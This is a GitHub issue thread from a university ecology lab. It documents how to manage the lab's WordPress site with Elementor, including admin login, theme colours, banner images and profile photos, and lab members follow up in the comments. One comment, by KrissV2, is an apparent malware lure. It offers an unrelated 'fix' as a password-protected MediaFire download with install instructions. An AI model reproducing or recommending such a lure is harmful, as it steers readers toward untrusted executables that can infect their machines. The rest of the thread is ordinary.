### ISSUE TITLE
Website management

### ISSUE THREAD

**Issue by ngoj1** [temporalecologylab/labgit#23]
**First please read through Tolu's guide on website management here:** https://drive.google.com/drive/folders/0B78cmbt261mmbHJLeEpoX0R4d0U?resourcekey=0-UOQjmLhRYNLZsk_TH7_nuA

**Changing lab colours, themes, homepage photo, etc.**
1. Log into the Wordpress admin dashboard here https://temporalecology.org/wp-admin/ using the account under temporalecologylab@gmail.com; Tolu advises making your personal account under this central account - which you should still do for other website tweaks - but if you need to edit more foundational aspects of the website, you need this higher level permission account.
2. For changing colours, go to temporalecology.org AFTER having already logged into temporalecologylab@gmail.com on the Wordpress dashboard. You should see a black bar on top of the screen that has words like customize, new, edit page, etc.
3. click the paintbrush icon with "customize" to start editing the website's theme. Under "Colors" you can find where the website's colour palette is; it should be set to "custom" and the colour you choose under "colour scheme" will be the colour that is used for accents like the search bar, hyperlinks, etc.
4. Under "Homepage Hero Area" is where you get to choose the banner image for the website. All other photo changes can be done through your personal website account using your own email, but in order to change this giant picture on the homepage you need the lab email account. Click "Media" and this is where you upload the header image.

1. ![image](https://github.com/user-attachments/assets/7c6aa069-fc7c-4168-9e59-dddbb07e74a8)
2. ![image](https://github.com/user-attachments/assets/8f8d742c-eda7-49b3-bdf0-91bacf5916db)
3. ![image](https://github.com/user-attachments/assets/2d9222f6-d48f-409d-b697-0a8b4a7d8b71)
4. ![image](https://github.com/user-attachments/assets/b86ed313-f4cc-423e-a9cc-97aa9dadfb3f)

**Editing with Elementor**
1. Aside from all the other things Tolu has already mentioned, here are some tips I've found for editing with the Elementor plugin.
2. When you want to edit text or add a new paragraph, the best way to preserve text formatting is to just copy/paste preexisting text on the page into your textbox when you choose to add a new widget. This is because the text presets in Elementor have their own formatting already which might be different from what you want, and to be honest it's not very ergonomic in terms of text customization.

**Uploading images**
1. You can use your personal account for these ones. If you want to change profile pictures for people in the lab, make sure the image size is at least 700 x 700 pixels (that's the smallest I've tried, but you can go smaller until you see which image size messes up the formatting)
2. You can use any online circle cropping website to edit the photo and then use Illustrator/Photoshop/Krita/etc. to change the image size.
3. In the "People" tab (which is where current members of the lab are located), copy one of the widget blocks (an image on one side and text on the other) and then upload your photo of choice. You will be given a sidebar on the left where you get to edit the image formatting. Set "Image resolution" to "Medium - 300 x 300"
4. In the "Previous People" page under "People", the "image resolution" should be set to "Large - 1024 x 1024"

1. ![image](https://github.com/user-attachments/assets/e8f012a7-64c3-4203-ba7a-ab14632d54fb)
2. ![image](https://github.com/user-attachments/assets/d890e538-8887-4a01-8aab-6051af96a73e)

**And make sure whenever you make changes you publish them!**
![image](https://github.com/user-attachments/assets/c05faa4d-98f3-4f60-a54e-237e60c387e3)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by lizzieinvancouver** [comment]
@plantlabT Some great info here. But I wonder if we should organize this other than in an issue (as git issues are supposed to get finished) and be closed. Also, I think our info on how to manage the main website has become disorganized. 

Let's make sure you can see the basic info on Teams/OneDrive tomorrow when meeting and then hopefully you can help track down where all this info is now that we have migrated to Teams/OneDrive and update it? It might be better to keep some of it here and a more minimal amount Teams/OneDrive?

Organizing info is a lower priority then updating the pages! So come back to this as you have time.

**Comment by plantlabT** [comment]
Yes @lizzieinvancouver ! For the header images, you cannot edit them with Elementor. You have to edit them directly through WordPress.

On WordPress -> go to Pages -> click on the page you want to edit -> on the right hand side, hover over the image -> click Replace -> choose your image and press "Set featured image" -> press Save at the top right

Let me know if those instructions make sense!

**Comment by plantlabT** [comment]
@lizzieinvancouver Done!

**Comment by lizzieinvancouver** [comment]
## Header image how to change

For me, since I always forget:
* go to edit the page -- to the point you see 'edit with elementor' as a big blue rectangle
* look upper right for settings options (next to the blue save button)
* this should drop down a side menu, where you can see the image and replace it (under 'page')

Thank you @plantlabT for this!!
